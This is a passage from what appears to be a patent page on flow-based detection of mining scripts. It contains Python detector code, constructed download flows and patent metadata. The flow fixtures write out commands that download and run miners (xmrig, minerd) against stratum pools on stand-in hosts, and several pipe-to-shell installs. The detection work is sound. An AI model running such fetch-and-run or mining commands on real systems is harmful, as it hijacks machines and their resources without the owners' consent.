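    return [w.lower() for w in words if len(w) >= 3 and w.lower() not in NOISE]


def build_word_sets(mining, normal, first_threshold):
    # Claim 1 definitions: feature words exceed the first threshold in total count over the
    # mining samples; special words occur in mining samples but never in normal samples.
    mining_counts = Counter(w for s in mining for w in tokenize(s))
    normal_vocab = {w for s in normal for w in tokenize(s)}
    feature = {w for w, c in mining_counts.items() if c > first_threshold}
    return feature, set(mining_counts) - normal_vocab, normal_vocab


@dataclass
class Detector:
    feature_set: set
    special_set: set
    normal_vocab: set
    intel: set  # IP addresses and domain names from threat intelligence

    def first_words(self, words):
        # Claim 2: pending words occur more than SECOND_THRESHOLD times in the script itself.
        pending = {w for w, c in Counter(words).items() if c > SECOND_THRESHOLD}
        return pending & self.feature_set

    def second_words(self, words):
        # Claim 3: every script word that is also in the special word set.
        return set(words) & self.special_set

    def classify(self, script):
        # Claim 4: mining when the two counts together exceed THIRD_THRESHOLD.
        words = tokenize(script)
        first, second = self.first_words(words), self.second_words(words)
        return len(first) + len(second) > THIRD_THRESHOLD, first, second

    def detect(self, flow):
        # One script download: match the flow against intel, run the model, branch as in claims 1 and 5 to 7.
        matched = flow["dst_ip"] in self.intel or flow["domain"] in self.intel
        mining, first, second = self.classify(flow["script"])
        result = {"matched": matched, "mining": mining, "first": first, "second": second,
                  "alert": False, "verdict": "normal", "added_special": set()}
        if matched and mining:                      # claim 1: alarm
            result.update(alert=True, verdict="mining")
        elif matched:                               # claim 5: learn new special words, alarm
            new = set(tokenize(flow["script"])) - self.normal_vocab - self.special_set
            self.special_set |= new
            result.update(alert=True, verdict="intel-hit", added_special=new)
        elif mining:                                # claim 6: learn new intel, alarm
            self.intel |= {flow["dst_ip"], flow["domain"]}
            result.update(alert=True, verdict="mining")
        return result                               # claim 7: otherwise a normal script


def build_detector():
    feature, special, normal_vocab = build_word_sets(MINING_SAMPLES, NORMAL_SAMPLES, FIRST_THRESHOLD)
    return Detector(feature, special, normal_vocab, set(THREAT_INTEL))


# Constructed script download events: flow metadata plus the fetched script body.
FLOWS = {
    "matched_mining": {"dst_ip": "198.51.100.23", "domain": "pool.example", "script":
        "curl -s http://pool.example/xmrig -o /tmp/xmrig && chmod +x /tmp/xmrig && "
        "/tmp/xmrig -o stratum+tcp://pool.example:3333 -u wallet"},
    "matched_benign": {"dst_ip": "198.51.100.23", "domain": "pool.example", "script":
        "curl -fsSL https://pool.example/setup.sh | sh\nnohup ./helper --quiet &"},
    "unmatched_mining": {"dst_ip": "203.0.113.9", "domain": "cdn2.example", "script":
        "wget -q http://cdn2.example/minerd && nohup ./minerd --algo cryptonight "
        "-o stratum+tcp://cdn2.example:4444 -u wallet &"},
    "unmatched_benign": {"dst_ip": "192.0.2.44", "domain": "repo.example", "script":
        "curl -fsSL https://repo.example/install.sh | sh && apt-get install -y nginx"},
}
```

With these corpora the generic token example reaches the feature set on frequency alone, which is why the third threshold, not any single word, decides the verdict.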
CN202310080142.2A 2023-02-08 2023-02-08 Flow-based mining script detection method and device Active CN115801466B (en)

Publications (2)

Publication Number Publication Date
CN115801466A true CN115801466A (en) 2023-03-14
CN115801466B CN115801466B (en) 2023-05-02

Family

ID=85430463

Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination
GR01 Patent grant